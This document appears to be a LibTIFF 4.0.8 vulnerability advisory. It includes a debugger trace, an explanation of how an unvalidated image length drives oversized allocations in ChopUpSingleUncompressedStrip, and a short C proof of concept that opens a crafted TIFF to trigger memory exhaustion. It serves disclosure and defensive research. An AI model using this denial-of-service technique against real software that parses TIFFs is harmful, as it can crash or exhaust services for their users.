poc
----------------------------------------------------------------------------------------------------------------------------------------------[ source:tif_dirread.c+5701 ]---- | |
5697 nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip); | |
5698 if( nstrips == 0 ) | |
5699 return; | |
5700 | |
// tif=0x00007fffffffe028 -> [...] -> "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", newcounts=0x00007fffffffe040 -> 0x0000000020f222ec | |
->5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
5702 "for chopped \"StripByteCounts\" array"); | |
5703 newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
5704 "for chopped \"StripOffsets\" array"); | |
5705 if (newcounts == NULL || newoffsets == NULL) { | |
----------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]---- | |
[#0] Id 1, Name: "TIFFOpen", stopped, reason: SINGLE STEP | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]---- | |
[#0] 0x418d42->Name: ChopUpSingleUncompressedStrip(tif=0x67b010) | |
[#1] 0x414d2f->Name: TIFFReadDirectory(tif=0x67b010) | |
[#2] 0x419f76->Name: TIFFClientOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r", clientdata=0x7fff00000003, readproc=0x4210b6 <_tiffReadProc>, writeproc=0x421184 <_tiffWriteProc>, seekproc=0x421252 <_tiffSeekProc>, closeproc=0x4212a9 <_tiffCloseProc>, sizeproc=0x4212c9 <_tiffSizeProc>, mapproc=0x421311 <_tiffMapProc>, unmapproc=0x4213a6 <_tiffUnmapProc>) | |
[#3] 0x421421->Name: TIFFFdOpen(fd=0x3, name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r") | |
[#4] 0x421528->Name: TIFFOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r") | |
[#5] 0x404afd->Name: main() | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
gef> p nstrips | |
$2 = 0x11223344 | |
gef> |
Title: LibTiff TIFFOpen Denial of Service Vulnerability | |
Version: V4.0.8 | |
Credit: Yu Zhou of Ant-financial Light-Year Security Lab | |
Description | |
In LibTIFF 4.0.8 there is a denial-of-service vulnerability reachable from the TIFFOpen function: a crafted input file is enough to trigger it, no pixel data needs to be decoded.
During TIFFOpen, td_imagelength is not validated against any upper bound; its value is taken directly from the input file, so it is fully attacker-controlled.
In ChopUpSingleUncompressedStrip, nstrips is derived from td_imagelength (nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip), line 5697 above) and is then passed twice to _TIFFCheckMalloc(tif, nstrips, sizeof(uint64), ...) for the chopped "StripByteCounts" and "StripOffsets" arrays. Choosing td_imagelength so that nstrips * sizeof(uint64) approaches available memory (the debugger session above shows nstrips = 0x11223344, i.e. two requests of roughly 2.3 GB each) can exhaust memory, hang the system or trigger the OOM killer. Whether this manifests as an OOM kill or merely as a failed allocation depends on the host's memory limits (ulimit, cgroup limits, overcommit policy), so the impact should be confirmed on the target configuration.
Because the oversized allocation happens inside TIFFOpen itself (TIFFOpen -> TIFFClientOpen -> TIFFReadDirectory -> ChopUpSingleUncompressedStrip, per the trace above), any software that merely opens an attacker-supplied TIFF with libtiff is exposed — e.g. ImageMagick, or distribution packages such as Debian's libtiff-based tools — even if it never reads image data.
#include <stdio.h> | |
#include <sys/syscall.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <string.h> | |
#include <errno.h> | |
#include "tiffio.h" | |
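/*
 * Proof of concept: simply opening the crafted file with TIFFOpen() reaches
 * the oversized _TIFFCheckMalloc() calls in ChopUpSingleUncompressedStrip()
 * (TIFFOpen -> TIFFClientOpen -> TIFFReadDirectory ->
 * ChopUpSingleUncompressedStrip in the trace above), so no image data is
 * ever read here.
 *
 * Usage: ./poc [path-to-tiff]
 *   With no argument the crash file shipped with this gist is used.
 *
 * Exit status: 0 when the file was opened and closed, 1 when TIFFOpen()
 * failed. (The original returned 0 on failure too, which hid the failure
 * from scripts and harnesses driving the PoC.)
 */
int main(int argc, char **argv)
{
    const char *path = (argc > 1)
        ? argv[1]
        : "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98";
    TIFF *tif;

    /* The td_imagelength-sized allocation happens inside this call. */
    tif = TIFFOpen(path, "r");
    if (tif == NULL) {
        /* Diagnostics go to stderr so they survive stdout redirection. */
        fputs("TIFFOpen error!\n", stderr);
        return 1;
    }

    TIFFClose(tif);
    return 0;
}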